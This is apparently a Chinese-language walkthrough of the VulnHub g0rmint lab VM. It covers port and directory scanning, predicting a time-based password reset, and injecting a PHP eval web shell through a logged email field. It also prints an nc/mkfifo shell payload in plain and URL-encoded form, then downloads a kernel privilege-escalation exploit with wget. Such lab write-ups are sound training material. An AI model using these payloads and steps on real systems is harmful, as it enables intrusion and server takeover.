带妹玩转vulnhub（二）

前言

今天还是没有妹子主动来找我，一怒之下再写一篇，以此祭天！哼！QAQ

带妹是不可能带妹的，这辈子都不可能带妹的?

开始

下载

此次的题目是g0rmint，同样的需要下载对应的镜像文件，地址

https://www.vulnhub.com/entry/g0rmint-1,214/

注意下载完成后需要校验md5或者sha1，同样的使用VMware打开

基本配置

基本配置

It is based on a real world scenario I faced while testing for a client's site. Dedicated to Aunty g0rmint who is fed up of this government (g0rmint). Does anyone need to know about that Aunty to root the CTF? No The CTF is tested on Vmware and wofile:///Volumes/MacFile/文章/带妹玩转Vulnhub【一】/03.pngrking well as expected. Difficulty level to get limited shell: Intermediate or advanced Difficulty level for privilege escalation: No idea Give me feed back @nomanriffat

这是一段来自官网的描述！?

渗透测试

ip扫描

首先虚拟机的网络得配置正确，否则再扫描都是白费！切记切记！

很轻易的可以探测出ip地址

端口扫描

使用nmap进行简单的端口扫描，可以看到只开放了80和22端口。

网站目录扫描

尝试访问80端口，但是直接404了，小白的我也不懂404是咋个回事，照着昨天的思路，扫描一下目录看看有没有什么发现。 使用dirbuster一无所获，然后我又尝试着使用御剑进行扫描。

发现一个robots.txt，访问一下看看有什么信息。

应该是提示有g0rmint目录的含义吧。

登陆页面尝试一下弱口令，但是好像没有什么收获，再次针对此目录进行一个子目录的扫描。

但是没有任何的结果，查看一下源代码，发现一段有趣的代码。

所以修改目录后重新进行扫描，这里又可以使用另一个扫描工具dirb

当然我同样使用御剑进行了扫描，结果可喜可贺！

登陆上info.php进行查看，最终可以得到backup.zip 打开一看这应该是网站的源码，那么接下来就需要进行代码审计了。

代码审计

说实话，web的代码我还真看不懂，所以也不敢班门弄斧。 这里只能贴上几张图片了

看到一个用户可以解出md5，但是尝试登陆失败。 分析了一下重置密码的逻辑，通过邮箱和用户名便可以进行密码的重置，并且密码是右下角时间的sha1的加密。

然后也可以看到重置密码的流程，就是将时间进行了sha1加密，取了前20位。这里进行重置，根据右下角的时间计算出密码，然后重新登陆，便可以进入到控制台。

shell

主要还是需要代码审计，成功登陆后，在控制板上并没有什么发现。 此时查看后台生成log文件，根据当前的年月日访问对应的路径，发现此处的邮箱被写进了对应的php中，而且没有进行任何过滤。

那么我们完全可以在邮箱处，写一个命令执行。

<?php eval($_POST[_]); ?>

而后尝试获取phpinfo()的信息，成功的返回，然后我们写一个反向的shell。

注意在写shell的时候需要使用url编码

_=`mkfifo /tmp/t`; _=`cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t`;

_=%60mkfifo%20%2ftmp%2ft%60%3B _=%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

分两次进行提交即可，刚开始不太清楚mkfifo是什么命令，查了一下手册，就是开启一个管道进行通信。

之后我们便可以通过

nc -n 192.168.43.191 8888

进行连接。

此时的用户为www-data 接下来就是想办法提权！?

妹子表示想哭?

提权

首先简单的查看一下目标系统的版本信息

uname -a cat /etc/lsb-release

我记得16.04有个很经典的本地提权漏洞，尝试一下。 这里还是借助kali下的searchsploit工具进行漏洞脚本的查询。

另外github上有人收集整理了linux上的漏洞合集，也推荐给大家此处 我真的小白。在上传文件的时候遇到很多问题。 如果你没有连接互联网，那么需要在kali下搭建一个web服务器，由于kali都自带了，所以只需要启动apache服务就可以了。 /etcinit.d/apache2 start 之后将所需的*.c copy到/var/www/html目录下，之后便可以通过wget http://192.168.43.153/44298.c将44298.c文件下载到目标服务器了，但是在使用gcc编译时提示目标主机没有gcc，那么同样的我们在对应的ubuntu1604环境下进行编译，然后将生成的ELF文件上传至目标服务器。

如果你所处的环境为互联网，那么可以使用Gist，这里就不多提了。

root

拿到root权限之后，我们就可以恣意妄为了，哈哈?

妹子投来崇拜的目光！QAQ?

总结

今天又学到了一波工具?，感觉自己好low，尤其是在代码审计那一块，复现也是遇到了很多问题，不过最后拿到root，同时学到了很多知识，而且赢得妹子的青睐，血赚！ 接下来就是对妹子的进一步攻击！????

带妹是不可能带妹的！

参考文章

https://xz.aliyun.com/t/2753#toc-4